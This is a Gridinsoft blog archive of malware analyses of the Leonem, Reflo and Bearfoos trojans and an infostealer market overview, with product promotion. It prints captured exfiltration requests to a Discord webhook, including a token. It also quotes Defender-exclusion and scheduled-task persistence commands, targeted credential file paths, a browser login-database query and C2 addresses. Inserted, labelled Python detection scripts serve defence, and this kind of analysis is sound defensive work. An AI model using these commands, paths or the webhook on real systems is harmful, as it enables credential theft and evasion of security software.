Spyware Archives – Gridinsoft Blog
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.

Trojan:Win32/Leonem
https://gridinsoft.com/blogs/trojan-win32-leonem/
Wed, 11 Sep 2024 13:37:54 +0000

Trojan:Win32/Leonem is a spyware that targets any login data on a compromised system, including saved data in browsers and email clients. It primarily spreads through malicious documents or disguised as legitimate software.

Trojan:Win32/Leonem Overview

Trojan:Win32/Leonem is the detection name used by Microsoft Defender to identify spyware. It’s a classic example of this malware type, which aims at stealing sensitive information from a victim’s system. In addition to its main function, it can also operate as a malware dropper, i.e. deliver other malware. In terms of its core functionality, Leonem can carry out activities like keylogging and collecting sensitive data (logins, browser passwords, browser history, cookies, cache, etc.). It also seeks out other login credentials stored on the compromised system, including those in email clients.

Trojan:Win32/Leonem detection popup

As for the payload, Leonem Trojan is capable of downloading additional malicious components. Most often, it deploys ransomware and backdoors, though its capabilities are not limited to these threats. This malware typically spreads through malicious attachments in phishing emails or bundled add-ons with legitimate software from untrustworthy sources. Once launched on the system, Trojan:Win32/Leonem attempts to disable security software and modify system settings to ensure persistence by running each time the operating system boots.

Technical Analysis

Let’s now take a deeper look at the threat on an infected system. Since it is a classic information stealer, it has a rather predictable behavior pattern. The malware’s initial actions focus on detecting sandbox environments, debuggers, or virtual machines. To do this, Leonem leverages the following legitimate processes:

%windir%\System32\svchost.exe -k WerSvcGroup
wmiadap.exe /F /T /R
%windir%\system32\wbem\wmiprvse.exe
"%windir%\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

Leonem retrieves BIOS information using WMI queries, specifically targeting the Win32_Bios and Win32_NetworkAdapter classes. Additionally, it abuses the aspnet_compiler.exe process and queries hardware properties via WMI. Among other things, it inspects specific registry values and files, including:

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\Levels
C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config

In addition to detecting the virtual environment, the malware generates a system fingerprint to uniquely identify the infected system.

Next, the malware assesses the presence and status of installed anti-malware solutions. If Microsoft Defender is enabled on the system, the malware attempts to turn it off. This also allows the malware to establish persistence within the system. For all this, Leonem abuses the following legitimate processes and checks the following registry values and system locations:

C:\Windows\system32\services.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\SecurityHealthService.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiVirus
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\MpEngine_DisableScriptScanning

Data Collection

After all the checks, Trojan:Win32/Leonem initiates its primary operation: data collection. It gathers passwords and session tokens from browsers, email clients, and other applications that keep auth details locally. In addition, the malware creates a DirectInput object, enabling it to function as a keylogger, i.e. capture all text typed on the keyboard. It specifically targets the following file paths:

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\\AppData\Local\360Chrome\Chrome\User Data
C:\Users\\AppData\Local\Chromium\User Data
C:\Users\\AppData\Local\Mailbird\Store\Store.db
C:\Users\\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
C:\Users\\AppData\Local\Microsoft\Edge\User Data\Login Data
C:\Users\\AppData\Local\Tencent\QQBrowser\User Data\Default\EncryptedStorage
C:\Users\\AppData\Local\Torch\User Data
C:\Users\\AppData\Local\UCBrowser\
C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\1hmu7354.default-release\logins.json
C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\1hmu7354.default-release\signons.sqlite
C:\Users\\AppData\Roaming\Mozilla\Firefox\profiles.ini
C:\Users\\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini
C:\Users\\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
C:\Users\\AppData\Roaming\Thunderbird\profiles.ini

Leonem collects data both in plain text and in hashed form.

Data Exfiltration

At the final stage of the attack, Trojan:Win32/Leonem sends the gathered data to its command server. The reviewed sample uses a Discord webhook for this purpose. Beforehand, the malware sets up TCP connections on ports 443 and 80, which confirms that it attempts to communicate with remote servers to transmit information or receive commands. Below are some of the requests sent to that webhook.

POST https://discord.com:443/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f 200
POST https://discord.com/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f 404

The 200 status at the end means that the request was successfully completed, while the 404 indicates that the webhook was not found, most likely because it has been deleted or changed. In addition, the malware queries the ip-api.com service to retrieve details about the environment in which it is executed. In this way, it tries to determine whether it is running on a hosting provider’s server or on a regular computer.
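One way a defender could spot the two network behaviours described above, webhook POSTs to Discord and ip-api.com lookups, in outbound proxy logs. This is an added example written for this page, not code from the original post or from Gridinsoft; the log line layout, the host names and the webhook ID and token in the sample are constructed assumptions.

```python
"""Spot Discord-webhook exfiltration plus ip-api.com fingerprinting in proxy logs."""
import re
from collections import defaultdict

# Discord webhook URL: the numeric ID and the secret token are the last two path parts.
WEBHOOK_RE = re.compile(
    r"https?://(?:[\w-]+\.)?discord(?:app)?\.com(?::\d+)?"
    r"/api/webhooks/(?P<id>\d+)/(?P<token>[\w-]+)"
)
# ip-api.com geolocation lookups, which the analysis above says the sample performs.
IPAPI_RE = re.compile(r"^https?://ip-api\.com/")
# One record per line: "<timestamp> <client> <method> <url> <status>" (assumed layout).
LINE_RE = re.compile(r"^(\S+) (\S+) (GET|POST|PUT|DELETE) (\S+) (\d{3})$")

# Constructed sample log; the webhook ID and token below are made up, not real IoCs.
SAMPLE_LOG = """\
2024-09-11T13:01:02Z ws-017 GET http://ip-api.com/json/ 200
2024-09-11T13:01:05Z ws-017 POST https://discord.com:443/api/webhooks/123456789012345678/aBcDeF-gHiJkL 200
2024-09-11T13:01:09Z ws-017 POST https://discord.com/api/webhooks/123456789012345678/aBcDeF-gHiJkL 404
2024-09-11T13:02:00Z ws-042 GET https://discord.com/api/v9/gateway 200
2024-09-11T13:03:00Z ws-099 GET http://ip-api.com/json/ 200
"""


def parse_line(line):
    """Return (ts, client, method, url, status) or None for a malformed line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status = m.groups()
    return ts, client, method, url, int(status)


def redact_webhook(url):
    """Keep the webhook ID (useful for blocking or takedown) but mask the token."""
    m = WEBHOOK_RE.search(url)
    if not m:
        return url
    token = m.group("token")
    return f"discord webhook id={m.group('id')} token={token[:4]}... ({len(token)} chars)"


def analyze(log_text):
    """Per-client findings for clients showing at least one of the two behaviours.

    Each entry: {"webhook_posts": [(ts, redacted_url, status)], "ipapi": bool,
                 "score": int}; score 2 means both exfiltration and host
                 fingerprinting were seen, score 1 only one of them.
    """
    seen = defaultdict(lambda: {"webhook_posts": [], "ipapi": False})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, client, method, url, status = rec
        if method == "POST" and WEBHOOK_RE.search(url):
            seen[client]["webhook_posts"].append((ts, redact_webhook(url), status))
        elif IPAPI_RE.match(url):
            seen[client]["ipapi"] = True
    result = {}
    for client, f in seen.items():
        score = (1 if f["webhook_posts"] else 0) + (1 if f["ipapi"] else 0)
        if score:
            result[client] = {**f, "score": score}
    return result


if __name__ == "__main__":
    for client, f in sorted(analyze(SAMPLE_LOG).items()):
        print(client, "score", f["score"], "ip-api lookup:", f["ipapi"])
        for ts, desc, status in f["webhook_posts"]:
            # A 404 following a 200 on the same webhook hints it was deleted or rotated.
            print("   ", ts, desc, status)
```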

How To Remove Trojan:Win32/Leonem?

As we can see, Trojan:Win32/Leonem is a rather serious threat that deactivates Microsoft Defender whenever possible. Therefore, to effectively remove this Trojan, it’s recommended to use a reliable third-party anti-malware solution like GridinSoft Anti-Malware. To eliminate Trojan:Win32/Leonem from your system, follow these steps:

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the anti-malware program takes on each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection: malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Trojan:Win64/Reflo.HNS!MTB
https://gridinsoft.com/blogs/trojan-win64-reflo-hns-mtb/
Tue, 03 Sep 2024 21:42:03 +0000

Win64/Reflo.HNS!MTB is a detection of a malware sample that aims at stealing confidential information. It usually spreads through game mods and works as quietly as possible. This virus may belong to any malware family, as it is a behavioral detection of a specific action it performs in the system.

Win64/Reflo.HNS!MTB Overview

Trojan:Win64/Reflo.HNS!MTB is a heuristic detection used by Microsoft Defender to detect a specific type of malware. This malware is a type of spyware that actively collects sensitive information, such as user credentials, from the victim’s system. Heuristic detection is used when malware has characteristics and behavioral patterns that match known threats but no matching signature in the antivirus database.

Win64/Reflo.HNS!MTB detection popup

After execution, the Reflo Trojan starts its malicious activity immediately, with the primary goal of stealing confidential information. This can end up with your social media accounts sending spam messages and your banking accounts being drained. This type of malware is designed to operate stealthily, so its presence is usually difficult to detect. In most cases, the victim only discovers it when significant damage has already been done, such as the aforementioned unauthorized access to online accounts.

As with most similar threats, Trojan:Win64/Reflo.HNS!MTB is often spread via pirated software. Repackers, modders, and websites that distribute pirated games, cracked programs, or mods may add it as a hidden addition to their repacks. It can also spread through email attachments, malicious links, or accidental downloads on compromised websites. However, the main source of this threat is questionable game mods.

Technical Analysis

Now let’s see how this malware behaves on a compromised system. As mentioned earlier, this virus is mainly distributed via game mods. This suggests that, by default, any detection on such a file might be a false positive. Although the user won’t notice anything visually, clicking “allow” triggers certain processes in the system.

The process begins with the following command:

"C:\Windows\system32\cmd.exe" /c "cd ^"C:\Users\\AppData\Local\Temp^" && start /wait ^"^" ^"C:\Users\\AppData\Local\Temp\Appname/Setup.bat^"
C:\Windows\system32\cmd.exe /K "C:\Users\\AppData\Local\Temp\Appname/Setup.bat
python Setup.py

Next, the malware checks for the presence of a sandbox or virtual environment and fingerprints the system. To do this, it checks the following registry keys:

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\ActiveComputerName

This is a standard step for malware: it prevents the threat from running in a virtual environment where it could be analyzed. In addition, Trojan:Win64/Reflo.HNS!MTB uses some tricks to hinder dynamic analysis.

Payload

The following commands are used by the Reflo Trojan to drop and unpack the payload:

"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\RedTiger-Tools-main.zip"
7620 - C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\cjov35ys.mq0" "C:\Users\user\Desktop\Appname.zip"
7660 - C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

The malware drops many files into the Windows temporary directory C:\Users\user\AppData\Local\Temp\, including many “.py” files that are necessary for the malware to work.

Credential Access

The next step is to collect confidential information. This is done by creating a DirectInput object that enables the malware to read keystrokes. In this way, attackers can intercept usernames and passwords that the victim enters on their device. Once the user authorizes the execution of this threat, it can run in the background for an extended period. The malware is extremely stealthy, and the name of the executable can be random. Therefore, the user is unlikely to realize why they can no longer log into their account.

Besides keylogging, the stealer also collects confidential data already stored on the system. Among other things, the malware can collect cookies, saved passwords, and credit card information from autofill forms in popular browsers. Even though the latest browser versions store this information encrypted, that does not protect it completely. Typically, the query against the browser’s login database looks like this:

SELECT action_url, username_value, password_value FROM logins

Almost always, infostealer malware like Reflo.HNS!MTB targets the most popular web browsers. Chrome, Chromium, Opera, Firefox and some of the popular alternatives to the mainstream applications are on the target list. Still, using a niche browser won’t always protect you: malware operators can easily adjust the list of applications their virus extracts credentials from.

C2 Connection

The malware communicates with multiple addresses on the internet, but certain addresses are of particular interest. Specifically, it attempts to connect to .onion addresses, which are associated with the Darknet. Our instance is trying to connect to:

3bp7szl6ehbrnitmbyxzvcm3ieu7ba2kys64oecf4g2b65mcgbafzgqd.onion
55niksbd22qqaedkw36qw4cpofmbxdtbwonxam7ov2ga62zqbhgty3yd.onion
7mejofwihleuugda5kfnr7tupvfbaqntjqnfxc4hwmozlcmj2cey3hqd.onion
ajlu6mrc7lwulwakojrgvvtarotvkvxqosb4psxljgobjhureve4kdqd.onion

These are just a few of the addresses; in addition to darknet sites, the malware tries to connect to URLs related to Discord, Telegram, Mastodon or similar social networks. That tactic allows fraudsters to mask the final command servers, as the corresponding user profiles contain nothing but the link to the “main” C2.

How To Remove Trojan:Win64/Reflo.HNS!MTB?

To remove Trojan:Win64/Reflo.HNS!MTB, it’s essential to use an advanced anti-malware solution. I recommend GridinSoft Anti-Malware, as it can offer permanent protection against most threats in addition to cleaning. The first step is to scan your system and remove all detected threats. To do this, follow the instructions below:

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the anti-malware program takes on each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection: malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

After removing the threats, be sure to change your account passwords and terminate any suspicious sessions. This step is crucial to prevent attackers from regaining access to compromised accounts.

Trojan:Win32/Bearfoos.B!ml
https://gridinsoft.com/blogs/trojan-win32-bearfoos-bml/
Sat, 13 Jul 2024 12:31:59 +0000

Trojan:Win32/Bearfoos.B!ml is a detection of Microsoft Defender associated with data stealing malware. It may flag this malware due to its specific behavior patterns, assigning that name even to malicious programs of well-known families. As Defender uses machine learning for this detection, it can sometimes be a false positive.

Trojan:Win32/Bearfoos.B!ml Overview

Trojan:Win32/Bearfoos.B!ml is a detection of Microsoft Defender’s AI system for infostealer malware and spyware. Typically, the malware this detection flags belongs to a broader family, but it may also be a small-batch virus. The reason for the detection is a specific behavior pattern that the AI system has spotted, which means it is not really clear what exactly triggered it. Bearfoos embeds itself deeply into the system, often unnoticed by the user. It targets cookies, password databases, cryptocurrency wallets, and other sensitive information stored on the infected system.

Trojan:Win32/Bearfoos.B!ml detection

Once the data is collected, the malware transmits it to a command-and-control server, then enters a dormant state, waiting for further commands. This allows it to remain undetected for extended periods. In addition to data theft, Bearfoos can log keystrokes, take screenshots, record video or audio using the system’s peripherals, and perform other spying activities.

Trojan:Win32/Bearfoos.B!ml spreads using methods typical for this type of malware. Most commonly, it is distributed through game cheats, mods, and dubious utilities. The second most common method of distribution is email spam.

Technical Analysis

Let’s break down how Trojan:Win32/Bearfoos.B!ml behaves in an infected system. The particular sample that I am reviewing appears to be an offshoot of AgentTesla spyware. I’ll try to explain the most important aspects of this threat as clearly as possible.

Upon infiltrating the system, the malware checks the following locations for signs of sandboxes and debuggers. This is a typical step malware takes to avoid analysis and “useless” infections.

C:\drivers\etc\hosts
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\system32\VERSION.dll

Gaining Persistence

After that, it drops a copy of itself into the AppData\Roaming folder under a random name. In my case, it was vzCravLx.exe. Next, the malware checks the Microsoft Defender settings:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiVirus

These registry values pertain to various components of the system’s anti-malware protection settings. The malware checks them to understand the system’s security posture and plan its further actions. In our scenario, where the Defender settings were still at their defaults, Bearfoos proceeded to alter them. It executes this selection of commands:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\\AppData\Roaming\vzCravLx.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vzCravLx" /XML "C:\Users\\AppData\Local\Temp\tmp6EAE.tmp

This is what provides persistence to the malware. With the first command, it excludes the path to its own executable from Microsoft Defender scanning. The second command creates a task in Task Scheduler that runs the malware periodically. After that, Bearfoos a.k.a. AgentTesla deletes the original file and keeps operating only through these protected duplicates.
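A detection for the persistence chain just described, a Defender exclusion for a user-writable path followed by a scheduled task imported from Temp, which also covers the Defender tampering attributed to Leonem earlier on this page. This is an added example, not code from the original post or from Gridinsoft; the process-event layout, the host names, the user name alice and the benign pc-12 comparison events are constructed assumptions, while the vzCravLx and tmp6EAE.tmp names come from the analysis above.

```python
"""Flag the Defender-exclusion + scheduled-task persistence chain in process-creation events."""
import re
from collections import defaultdict

# Locations a standard user can write to; Bearfoos placed its copy in AppData\Roaming.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)

# One command-line argument, either "quoted with spaces" or bare.
ARG = r'(?:"(?P<{q}>[^"]+)"|(?P<{u}>\S+))'
EXCLUSION_RE = re.compile(
    r"Add-MpPreference\b.*?-ExclusionPath\s+" + ARG.format(q="pq", u="pu"), re.IGNORECASE)
SCHTASKS_RE = re.compile(
    r"schtasks(?:\.exe)?\"?\s+/Create\b.*?/TN\s+" + ARG.format(q="tq", u="tu")
    + r".*?/XML\s+" + ARG.format(q="xq", u="xu"), re.IGNORECASE)

SEVERITY = {"info": 0, "medium": 1, "high": 2, "critical": 3}

# Constructed sample events: (host, parent image, image, command line). The pc-12
# events are benign admin/installer activity included for contrast.
SAMPLE_EVENTS = [
    ("pc-07", r"C:\Users\alice\AppData\Roaming\vzCravLx.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference '
     r'-ExclusionPath "C:\Users\alice\AppData\Roaming\vzCravLx.exe"'),
    ("pc-07", r"C:\Users\alice\AppData\Roaming\vzCravLx.exe",
     r"C:\Windows\System32\schtasks.exe",
     r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vzCravLx" '
     r'/XML "C:\Users\alice\AppData\Local\Temp\tmp6EAE.tmp"'),
    ("pc-12", r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe Add-MpPreference -ExclusionPath D:\build\out"),
    ("pc-12", r"C:\Program Files\Vendor\setup.exe",
     r"C:\Windows\System32\schtasks.exe",
     r'schtasks.exe /Create /TN "Vendor\Updater" /XML "C:\Program Files\Vendor\updater.xml"'),
]


def _arg(m, q, u):
    """Value of a quoted-or-bare argument captured by ARG."""
    return m.group(q) if m.group(q) is not None else m.group(u)


def classify(event):
    """Return [(severity, reason), ...] for a single process-creation event."""
    host, parent, image, cmd = event
    hits = []
    m = EXCLUSION_RE.search(cmd)
    if m:
        path = _arg(m, "pq", "pu")
        if USER_WRITABLE.search(path):
            hits.append(("high", f"Defender exclusion for user-writable path {path}"))
        else:
            hits.append(("info", f"Defender exclusion added for {path}"))
    m = SCHTASKS_RE.search(cmd)
    if m:
        tn, xml = _arg(m, "tq", "tu"), _arg(m, "xq", "xu")
        if TEMP_DIR.search(xml):
            hits.append(("high", f"task {tn} imported from Temp: {xml}"))
        else:
            hits.append(("info", f"task {tn} created from {xml}"))
    # Either action issued by a binary living in the user profile is itself suspicious.
    if hits and USER_WRITABLE.search(parent):
        hits.append(("medium", f"issued by a parent running from {parent}"))
    return hits


def correlate(events):
    """Group hits per host; raise to critical when the excluded file and the task share a name."""
    hosts = defaultdict(lambda: {"exclusions": [], "tasks": [], "alerts": []})
    for ev in events:
        host, _parent, _image, cmd = ev
        hosts[host]["alerts"].extend(classify(ev))
        m = EXCLUSION_RE.search(cmd)
        if m:
            hosts[host]["exclusions"].append(_arg(m, "pq", "pu"))
        m = SCHTASKS_RE.search(cmd)
        if m:
            hosts[host]["tasks"].append(_arg(m, "tq", "tu"))
    for d in hosts.values():
        # Bearfoos excluded ...\vzCravLx.exe and then created the task Updates\vzCravLx.
        stems = {p.rsplit("\\", 1)[-1].rsplit(".", 1)[0].lower() for p in d["exclusions"]}
        for tn in d["tasks"]:
            if tn.rsplit("\\", 1)[-1].lower() in stems:
                d["alerts"].append(("critical", f"exclusion and task share the name {tn}: persistence chain"))
    return dict(hosts)


def max_severity(alerts):
    """Highest severity label in a list of (severity, reason), or None if empty."""
    return max((s for s, _ in alerts), key=SEVERITY.get, default=None)


if __name__ == "__main__":
    for host, d in sorted(correlate(SAMPLE_EVENTS).items()):
        print(host, max_severity(d["alerts"]))
        for sev, reason in d["alerts"]:
            print("   ", sev, reason)
```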

Data Collection

The next phase involves the collection of sensitive information. First of all, the malware checks a selection of files that belong to web browsers, looking for passwords, cookies and session tokens. Here is the list of browsers in question:

  • 360Chrome
  • Microsoft Edge
  • 7Star
  • Amigo
  • Brave Browser
  • Citrio
  • CentBrowser
  • Chedot
  • Chromium
  • Orbitum
  • CocCoc Browser
  • Comodo Dragon
  • Coowon
  • Elements Browser
  • Epic Privacy Browser
  • Sleipnir5 (Fenrir Inc)
  • Iridium
  • Kometa
  • ChromePlus (MapleStudio)

As we can see, these locations mainly consist of user data from Chromium-based web browsers. Aside from them, the malware harvests credentials from desktop email clients and some FTP/VPN applications.

Command & Control Server

The Bearfoos trojan sends HTTP requests to the following addresses to download various files, including a CAB file from the Windows Update server and certificates from Sectigo and Microsoft:

GET http://download.windowsupdate.com/d/msdownload/update/others/2015/05/17930914_a3b333eff1f0428f5a2c87724c542504821cdbd8.cab
GET http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt 200
GET http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c 200
GET http://www.microsoft.com/pki/certs/MicCodSigPCA_08-31-2010.crt 200
GET http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt 200

These requests might be attempts to disguise malicious activity as legitimate actions. The malware also resolves DNS names for several domains, including the legitimate download.windowsupdate.com, and potentially suspicious domains such as mail.commtechtrading[.]com and chir104.websitehostserver[.]net. These latter domains could be part of its command-and-control (C2) infrastructure used for data exfiltration. The malware establishes the following TCP/UDP connections with various IP addresses:

TCP 23.53.122.213:80
TCP 173.236.63.6:587
TCP 20.99.133.109:443
TCP 23.216.147.71:80
TCP 23.216.81.152:80
UDP 192.168.0.12:137

After completing the data exfiltration, the malware enters a waiting mode, listening for commands from the C2 server. During this standby period, it continues to collect data, capturing keystrokes, taking screenshots, and recording audio and video from peripheral devices.

Is Trojan:Win32/Bearfoos.B!ml a False Positive?

As I mentioned earlier, the detection of Trojan:Win32/Bearfoos.B!ml is performed using Microsoft Defender’s AI-based system. However, this method is prone to false positives, and legitimate files, such as those associated with recently updated games or programs, are often mistakenly flagged as malicious. In particular, it is common to see false positives on small-batch programs from GitHub, certain emulator apps, and in some bizarre cases even Windows’ own files.

While it is easy to spot a false positive with a program that you know and trust, doing so with a less familiar app may be problematic. If you are not sure about the source and developer, bold guessing may be a particularly destructive practice. That is why a second-opinion anti-malware scan is needed.

How to Remove Trojan:Win32/Bearfoos.B!ml?

To remove the Bearfoos.B!ml trojan or check whether it is a real detection, I recommend using GridinSoft Anti-Malware. This program is not vulnerable to malware attacks the way Microsoft Defender is, and will easily spot even the most recent malware samples thanks to its multi-component detection system. Follow the guide below to get your system as good as new.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the anti-malware program takes on each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection: malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

What is Infostealer Malware? Top 5 Stealers in 2024
https://gridinsoft.com/blogs/infostealer-malware-top/
Wed, 19 Jun 2024 13:16:29 +0000

The cybercrime world changes rapidly, expanding, collapsing and evolving both extensively and intensively. One of the most widespread malware types in the modern threat landscape, infostealer malware, appears to be entering a new stage of development. Though its major names remain the same, some new malware families with promising features have popped up. Let’s have a peek at all of them and see what to expect.

Infostealer Malware Market in 2024

Infostealer malware has gained more and more popularity over the last decade, but the biggest spike happened during the last few years. The first noticeable factor is the massive popularisation of cryptocurrencies. How is that related? Well, relatively big amounts of money have always attracted the attention of hackers. Carding and banking fraud, though, are now less effective, as banks implemented strict control measures back in the early 2010s. Cryptocurrency wallets, on the other hand, have low to no controls, making them ideal targets for infostealers.

Infostealer Malware stats

Another reason that made spyware and infostealers so popular and widespread is their massive use in attacks on corporations. Even when hackers break into a network to encrypt the files and ask for a ransom for their decryption, they also drop infostealer malware that exfiltrates as much valuable information as possible. Afterwards, the hackers demand an additional ransom to keep this data secret. Some attacks are based exclusively on stealers, and the result of their work is either sold on the Darknet or used for business email compromise (BEC) attacks. Additionally, some ransomware groups that target home users started adding spyware to their attack chain a while ago.

Infostealer Malware Market Leaders

As of May 2024, three major malware families dominate the market: RedLine, Raccoon, and Vidar. None of them is new at this point, with Vidar having been active for the longest time. Let’s have a closer look at them, starting with the youngest one.

RedLine Infostealer

RedLine infostealer appeared in 2020 and has seen pretty wide use in different cyberattacks. Most of the time, however, it was aimed at single users, as its functionality fits this purpose best. Key targets for RedLine are cryptocurrency wallet data, both from desktop versions and browser plugins. Still, it can gather other data, like FTP/VPN configurations and session tokens for apps like Discord or Steam. Having held a pretty large market share at the turn of 2024, it became much less active starting from March 2024. Yet the enormous number of new samples that popped up recently may be a sign of another campaign getting ready. The RedLine developers find the hackers who buy this malware through Telegram groups and Darknet forums.

Telegram group post that advertises RedLine malware

Raccoon Infostealer

Raccoon has key properties similar to those RedLine offers, but is capable of capturing a much wider selection of data. In its scope are browser autofill files, cookies, and online banking credentials, on top of the ability to pluck cryptocurrency wallets. Since its emergence in early 2019, Raccoon has held a dominant position on the market, and keeps holding it even now. In the summer of 2022, its developers released a new version, promising faster and more reliable malware for a slightly higher price. Same as RedLine, Raccoon stealer is commonly spread through ads in Telegram channels and bots; Darknet platforms are less preferred, though they are used for public communication.

Admin panel of Raccoon stealer

Vidar Infostealer

Among the top 3 infostealer threats, Vidar is most definitely a dark horse. It is considered to be an offspring of Arkei stealer, malware that made quite a name for itself back in the early 2010s. After its launch in 2018, it never had a dominant share of the market, being at best #2. Nonetheless, its efficiency and unique design are hard to deny: Vidar offers a modular approach to data stealing and has an uncommon way of C2 communication. It also self-destructs after successful data exfiltration. Additionally, it is often spread in a bundle with other malware, such as STOP/Djvu ransomware. Methods of selling it to cybercriminals, however, are less unique: it uses Telegram channels dedicated to malware promotion.

Newbies

It would be quite reckless to deny the importance of new malware. For sure, not all of them will make it even to the 1-year milestone, but Raccoon and Vidar were once newbies as well, and you can see where they are now. Among the stealer families that popped up over the last year, there are a couple you should keep in mind.

Lumma

Also known as LummaC2, this infostealer appeared in December 2022. Even at first acquaintance with this malware, you can already see some fairly noteworthy details. On the “pricing plans” panel, the developers mention the ability to configure the payload in a specific manner and to add network sniffer functionality. The presence of these functions depends on the price of the chosen plan: $250, $500 or $1,000. Additionally, the developers offer access to the malware and panel source code, and the right to resell it, for $20,000. Other functions, however, are available regardless of the plan. Lumma can grab browser cookies, autofill forms, data from 2FA plugins/apps, and crypto wallet credentials from both apps and browser plugins.

Lumma infostealer pricing
Pricings for different LummaC2 stealer plans, posted on the Darknet website

Stealc

Stealc is another newcomer, first mentioned on January 9, 2023, on several Darknet forums. It appears to borrow best practices from the most popular stealers, which already makes it fairly potent. Among its unusual practices are a free trial and weekly releases of new features. Otherwise, the malware has the classic feature set of a modern infostealer: it gathers data from web browsers (cookies, autofill forms, etc.), cryptocurrency wallet extensions and even email clients and messengers. Such extended functionality, especially compared to other new malware examples, will definitely be appreciated by its clientele.

How to Protect Against Infostealer Malware?

Protection against threats like infostealers is always a tough question. The thing is, malware like this is forced to evolve constantly, finding new ways to be more efficient and stealthy. This makes any advice that reacts to specific malware features useless in the long term. However, there are still some things infostealer developers can’t (or don’t want to) change.

